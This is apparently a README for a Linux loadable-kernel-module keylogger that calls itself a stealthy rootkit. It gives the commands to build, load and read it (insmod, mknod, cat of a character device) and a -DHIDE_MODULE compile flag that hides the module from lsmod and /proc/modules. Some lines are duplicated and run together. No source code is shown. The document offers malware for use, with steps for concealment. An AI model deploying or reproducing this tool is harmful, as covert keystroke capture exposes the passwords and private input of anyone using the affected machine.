A stealthy Linux kernel-based keylogger that hides itself from lsmod and
/proc/modules.
This rootkit is in the form of a loadable kernel module. It receives keyboard
events from the kernel and outputs to a character device. Install using
insmod:
$ insmod keylog
$ dmesg | tail -n1
[ 498.484687] keylog: Registered device major number 249
$ mknod chrdev0 c 249 0 # create a character device, 249 is the major no.
$ cat chrdev0
dmesg | tail -n1
mknod chrdev0 c 249 0
cat chrdev0Make sure you have linux-headers installed.
$ makeTo hide the module from kernel, compile with -DHIDE_MODULE. You can also
change the buffer size BUFLEN that is used to store key events. By default it
is 1024 bytes.
$ KCPPFLAGS="-DHIDE_MODULE -DBUFLEN=2048" makeA Vagrant box with essential tools/packages is provided. Simply run the following commands to build the box:
$ vagrant up
$ vagrant ssh
vagrant@stretch:~$ cd /vagrant